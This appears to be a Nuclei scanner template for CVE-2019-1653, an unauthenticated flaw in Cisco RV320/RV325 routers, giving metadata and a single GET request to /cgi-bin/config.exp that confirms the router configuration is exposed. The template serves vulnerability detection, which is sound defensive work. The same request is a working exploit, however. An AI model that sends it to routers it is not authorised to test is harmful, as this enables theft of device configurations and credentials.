nuclei-templates/http/cves/2019/CVE-2019-1653.yaml

48 lines
2.0 KiB
YAML

id: CVE-2019-1653
info:
name: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure
author: dwisiswant0
severity: high
description: |
Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
impact: |
An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
remediation: |
Cisco has released firmware updates that address this vulnerability.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
- https://www.exploit-db.com/exploits/46262/
- https://www.exploit-db.com/exploits/46655/
- https://nvd.nist.gov/vuln/detail/CVE-2019-1653
- http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-1653
cwe-id: CWE-200,CWE-284
epss-score: 0.97567
epss-percentile: 1
cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: rv320_firmware
tags: packetstorm,kev,edb,cve,cve2019,cisco,router,exposure
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/config.exp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "sysconfig"
- type: status
status:
- 200
# digest: 4a0a00473045022100cb2e821e6bfdbdaa9e1bff496947f504ec4c28f43d3d7ac251c6f4ec12cc495302203eb1f16e0d17a3cb35e3f18bdde000ee171558b51985dd5592516328ea738838:922c64590222798bb761d5b6d8e72950